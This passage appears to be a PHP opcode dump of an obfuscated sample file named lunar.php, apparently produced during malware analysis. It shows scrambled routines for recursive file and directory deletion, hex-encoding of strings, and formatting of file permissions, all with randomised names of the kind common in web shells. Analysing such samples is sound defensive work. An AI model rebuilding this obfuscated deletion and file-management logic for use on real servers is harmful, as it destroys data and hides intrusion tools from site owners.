||38|*|JMP||||->49|
||39|>>|JMP||||->50|
||40|>|INIT_FCALL||||'rmdir'|
||41||SEND_VAR||||!0|
||42||DO_ICALL||||
||43|>|JMP||||->45|
||44|>>|JMP||||->37|
||45|>>|RETURN||||null|
||46|*|JMP||||->39|
||47|>|BIND_GLOBAL||||!1|,|'OwP2G'|
||48|>|JMP||||->21|
||49|>>|JMP||||->5|
||50|>|INIT_FCALL||||'array_map'|
||51||DECLARE_LAMBDA_FUNCTION||||'%00%7Bclosure%7D%2Froot%2Fsamples%2Flunar.php%3A2%240'|
||52||BIND_LEXICAL||||~12|,|!0|
||53||SEND_VAL||||~12|
||54||INIT_FCALL||||'array_diff'|
||55||INIT_FCALL||||'scandir'|
||56||SEND_VAR||||!0|
||57||DO_ICALL|||$13|
||58||SEND_VAR||||$13|
||59||SEND_VAL||||<array>|
||60||DO_ICALL|||$14|
||61||SEND_VAR||||$14|
||62||DO_ICALL||||
||63|>|JMP||||->33|
||64|>>|JMP||||->39|
||65|*|JMP||||->4|
||66|>>|RETURN||||null|
|
|Endoffunctionjq1ug

|Function%00%7Bclosure%7D%2Froot%2Fsamples%2Flunar.php%3A2%240:
|filename:|/root/samples/lunar.php
|functionname:|{closure}
|numberofops:|26
|compiledvars:|!0=$VcpvP,|!1=$kFdyP,|!2=$fTWYK
|line|#*|||op|fetch|ext|return|operands
||0|E>|RECV|||!0|
||1||BIND_STATIC||||!1|
||2|>|JMP||||->3|
||3|>|CONCAT|||~3|!1|,|'%2F'|
||4||CONCAT|||~4|~3|,|!0|
||5||ASSIGN||||!2|,|~4|
||6|>|JMP||||->10|
||7|>>|JMP||||->16|
||8|*|JMP||||->9|
||9|>>|JMP||||->21|
||10|>|INIT_FCALL||||'is_dir'|
||11||SEND_VAR||||!2|
||12||DO_ICALL|||$6|
||13|>|JMPZ||||$6|,|->15|
||14|>>|JMP||||->9|
||15|>>|JMP||||->17|
||16|>>|JMP||||->25|
||17|>|INIT_FCALL||||'unlink'|
||18||SEND_VAR||||!2|
||19||DO_ICALL||||
||20|>|JMP||||->7|
||21|>|INIT_FCALL_BY_NAME||||'Jq1Ug'|
||22||SEND_VAR_EX||||!2|
||23||DO_FCALL||0||
||24|>|JMP||||->16|
||25|>>|RETURN||||null|
|
|Endoffunction%00%7Bclosure%7D%2Froot%2Fsamples%2Flunar.php%3A2%240

|Functionce_vx:
|filename:|/root/samples/lunar.php
|functionname:|ce_VX
|numberofops:|33
|compiledvars:|!0=$FoyUI,|!1=$CtFAI,|!2=$KOcsV
|line|#*|||op|fetch|ext|return|operands
||0|E>|RECV|||!0|
||1|>|JMP||||->30|
||2|>|STRLEN|||~3|!0|
||3||IS_SMALLER||||!1|,|~3|
||4|>|JMPZ||||~4|,|->6|
||5|>>|JMP||||->18|
||6|>>|JMP||||->19|
||7|>|PRE_INC||||!1|
||8|>|JMP||||->25|
||9|>|INIT_FCALL||||'dechex'|
||10||INIT_FCALL||||'ord'|
||11||FETCH_DIM_R|||~6|!0|,|!1|
||12||SEND_VAL||||~6|
||13||DO_ICALL|||$7|
||14||SEND_VAR||||$7|
||15||DO_ICALL|||$8|
||16||ASSIGN_OP||8||!2|,|$8|
||17|>|JMP||||->27|
||18|>>|JMP||||->9|
||19|>>|JMP||||->29|
||20|*|JMP||||->18|
||21|>>|RETURN||||!2|
||22|*|JMP||||->32|
||23|>|ASSIGN||||!1|,|0|
||24|>|JMP||||->28|
||25|>>|JMP||||->28|
||26|*|JMP||||->29|
||27|>>|JMP||||->7|
||28|>>|JMP||||->2|
||29|>>|JMP||||->21|
||30|>|ASSIGN||||!2|,|''|
||31|>|JMP||||->23|
||32|*>|RETURN||||null|
|
|Endoffunctionce_vx

|Functionknstu:
|filename:|/root/samples/lunar.php
|functionname:|kNsTU
|numberofops:|204
|compiledvars:|!0=$ll7yH,|!1=$CtFAI,|!2=$kJDvx
|line|#*|||op|fetch|ext|return|operands
||0|E>|RECV|||!0|
||1|>|JMP||||->169|
||2|>>|JMP||||->48|
||3|*|JMP||||->71|
||4|>>|JMP||||->48|
||5|*|JMP||||->119|
||6|>>|JMP||||->48|
||7|*|JMP||||->20|
||8|>>|JMP||||->159|
||9|>>|JMP||||->48|
||10|*|JMP||||->118|
||11|>|ASSIGN||||!1|,|'d'|
||12|>|JMP||||->4|
||13|>|BW_AND|||~4|!2|,|2|
||14|>|JMPZ||||~4|,|->17|
||15|>|QM_ASSIGN|||~5|'w'|
||16|>|JMP||||->18|
||17|>|QM_ASSIGN|||~5|'-'|
||18|>|ASSIGN_OP||8||!1|,|~5|
||19|>|JMP||||->21|
||20|>>|JMP||||->82|
||21|>|BW_AND|||~7|!2|,|1|
||22|>|JMPZ||||~7|,|->30|
||23|>|BW_AND|||~8|!2|,|512|
||24|>|JMPZ||||~8|,|->27|
||25|>|QM_ASSIGN|||~9|'t'|
||26|>|JMP||||->28|
||27|>|QM_ASSIGN|||~9|'x'|
||28|>|QM_ASSIGN|||~10|~9|
||29|>|JMP||||->36|
||30|>|BW_AND|||~11|!2|,|512|
||31|>|JMPZ||||~11|,|->34|
||32|>|QM_ASSIGN|||~12|'T'|
||33|>|JMP||||->35|
||34|>|QM_ASSIGN|||~12|'-'|
||35|>|QM_ASSIGN|||~10|~12|
||36|>|ASSIGN_OP||8||!1|,|~10|
||37|>|JMP||||->44|
||38|>|BW_AND|||~14|!2|,|24576|
||39||IS_EQUAL|||~15|~14|,|24576|
||40||BOOL_NOT|||~16|~15|
||41|>|JMPZ||||~16|,|->43|
||42|>>|JMP||||->151|
||43|>>|JMP||||->161|
||44|>>|RETURN||||!1|
||45|*|JMP||||->203|
||46|>|ASSIGN||||!1|,|'-'|
||47|>|JMP||||->57|
||48|>>|JMP||||->142|
||49|>|BW_AND|||~18|!2|,|128|
||50|>|JMPZ||||~18|,|->53|
||51|>|QM_ASSIGN|||~19|'w'|
||52|>|JMP||||->54|
||53|>|QM_ASSIGN|||~19|'-'|
||54|>|ASSIGN_OP||8||!1|,|~19|
||55|>|JMP||||->186|
||56|>>|JMP||||->180|
||57|>>|JMP||||->48|
||58|*|JMP||||->90|
||59|>|BW_AND|||~21|!2|,|32768|
||60||IS_EQUAL|||~22|~21|,|32768|
||61||BOOL_NOT|||~23|~22|
||62|>|JMPZ||||~23|,|->64|
||63|>>|JMP||||->136|
||64|>>|JMP||||->86|
||65|>|BW_AND|||~24|!2|,|49152|
||66||IS_EQUAL|||~25|~24|,|49152|
||67||BOOL_NOT|||~26|~25|
||68|>|JMPZ||||~26|,|->70|
||69|>>|JMP||||->56|
||70|>>|JMP||||->93|
||71|>>|JMP||||->11|
||72|>|BW_AND|||~27|!2|,|32|
||73|>|JMPZ||||~27|,|->76|
||74|>|QM_ASSIGN|||~28|'r'|
||75|>|JMP||||->77|
||76|>|QM_ASSIGN|||~28|'-'|
||77|>|ASSIGN_OP||8||!1|,|~28|
||78|>|JMP||||->152|
||79|>>|JMP||||->140|
||80|>>|JMP||||->8|
||81|*|JMP||||->137|
||82|>|ASSIGN||||!1|,|'s'|
||83|>|JMP||||->91|
||84|>>|JMP||||->71|
||85|*|JMP||||->135|
||86|>>|JMP||||->118|
||87|*|JMP||||->136|
||88|>|ASSIGN||||!1|,|'c'|
||89|>|JMP||||->138|
||90|>>|JMP||||->126|
||91|>>|JMP||||->48|
||92|*|JMP||||->8|
||93|>>|JMP||||->20|
||94|*|JMP||||->56|
||95|>|BW_AND|||~32|!2|,|8192|
||96||IS_EQUAL|||~33|~32|,|8192|
||97||BOOL_NOT|||~34|~33|
||98|>|JMPZ||||~34|,|->100|
||99|>>|JMP||||->120|
||100|>>|JMP||||->122|
||101|>|BW_AND|||~35|!2|,|8|
||102|>|JMPZ||||~35|,|->110|
||103|>|BW_AND|||~36|!2|,|1024|
||104|>|JMPZ||||~36|,|->107|
||105|>|QM_ASSIGN|||~37|'s'|
||106|>|JMP||||->108|
||107|>|QM_ASSIGN|||~37|'x'|
||108|>|QM_ASSIGN|||~38|~37|
||109|>|JMP||||->116|
||110|>|BW_AND|||~39|!2|,|1024|
||111|>|JMPZ||||~39|,|->114|
||112|>|QM_ASSIGN|||~40|'S'|
||113|>|JMP||||->115|
||114|>|QM_ASSIGN|||~40|'-'|
||115|>|QM_ASSIGN|||~38|~40|
||116|>|ASSIGN_OP||8||!1|,|~38|
||117|>|JMP||||->128|
||118|>>|JMP||||->46|
||119|>>|JMP||||->88|
||120|>>|JMP||||->163|
||121|>>|JMP||||->149|
||122|>>|JMP||||->119|
||123|*|JMP||||->120|
||124|>>|JMP||||->121|
||125|*|JMP||||->79|
||126|>|ASSIGN||||!1|,|'b'|
||127|>|JMP||||->2|
||128|>|BW_AND|||~43|!2|,|4|
||129|>|JMPZ||||~43|,|->132|
||130|>|QM_ASSIGN|||~44|'r'|
||131|>|JMP||||->133|
||132|>|QM_ASSIGN|||~44|'-'|
||133|>|ASSIGN_OP||8||!1|,|~44|
||134|>|JMP||||->13|
||135|>>|JMP||||->95|
||136|>>|JMP||||->38|
||137|>>|JMP||||->59|
||138|>>|JMP||||->48|
||139|*|JMP||||->121|
||140|>|ASSIGN||||!1|,|'u'|
||141|>|JMP||||->6|
||142|>|BW_AND|||~47|!2|,|256|
||143|>|JMPZ||||~47|,|->146|
||144|>|QM_ASSIGN|||~48|'r'|
||145|>|JMP||||->147|
||146|>|QM_ASSIGN|||~48|'-'|
||147|>|ASSIGN_OP||8||!1|,|~48|
||148|>|JMP||||->49|
||149|>|ASSIGN||||!1|,|'p'|
||150|>|JMP||||->48|
||151|>>|JMP||||->174|
||152|>|BW_AND|||~51|!2|,|16|
||153|>|JMPZ||||~51|,|->156|
||154|>|QM_ASSIGN|||~52|'w'|
||155|>|JMP||||->157|
||156|>|QM_ASSIGN|||~52|'-'|
||157|>|ASSIGN_OP||8||!1|,|~52|
||158|>|JMP||||->101|
||159|>|ASSIGN||||!1|,|'l'|
||160|>|JMP||||->9|
||161|>>|JMP||||->90|
||162|*|JMP||||->151|
||163|>|BW_AND|||~55|!2|,|4096|
||164||IS_EQUAL|||~56|~55|,|4096|
||165||BOOL_NOT|||~57|~56|
||166|>|JMPZ||||~57|,|->168|
||167|>>|JMP||||->79|
||168|>>|JMP||||->124|
||169|>|INIT_FCALL||||'fileperms'|
||170||SEND_VAR||||!0|
||171||DO_ICALL|||$58|
||172||ASSIGN||||!2|,|$58|
||173|>|JMP||||->65|
||174|>|BW_AND|||~60|!2|,|16384|
||175||IS_EQUAL|||~61|~60|,|16384|
||176||BOOL_NOT|||~62|~61|
||177|>|JMPZ||||~62|,|->179|
||178|>>|JMP||||->135|
||179|>>|JMP||||->84|
||180|>|BW_AND|||~63|!2|,|40960|
||181||IS_EQUAL|||~64|~63|,|40960|
||182||BOOL_NOT|||~65|~64|
||183|>|JMPZ||||~65|,|->185|
||184|>>|JMP||||->137|
||185|>>|JMP||||->80|
||186|>|BW_AND|||~66|!2|,|64|
||187|>|JMPZ||||~66|,|->195|
||188|>|BW_AND|||~67|!2|,|2048|
||189|>|JMPZ||||~67|,|->192|
||190|>|QM_ASSIGN|||~68|'s'|
||191|>|JMP||||->193|
||192|>|QM_ASSIGN|||~68|'x'|
||193|>|QM_ASSIGN|||~69|~68|
||194|>|JMP||||->201|
||195|>|BW_AND|||~70|!2|,|2048|
||196|>|JMPZ||||~70|,|->199|
||197|>|QM_ASSIGN|||~71|'S'|
||198|>|JMP||||->200|
||199|>|QM_ASSIGN|||~71|'-'|
||200|>|QM_ASSIGN|||~69|~71|
||201|>|ASSIGN_OP||8||!1|,|~69|
||202|>|JMP||||->72|
||203|*>|RETURN||||null|
|
|Endoffunctionknstu

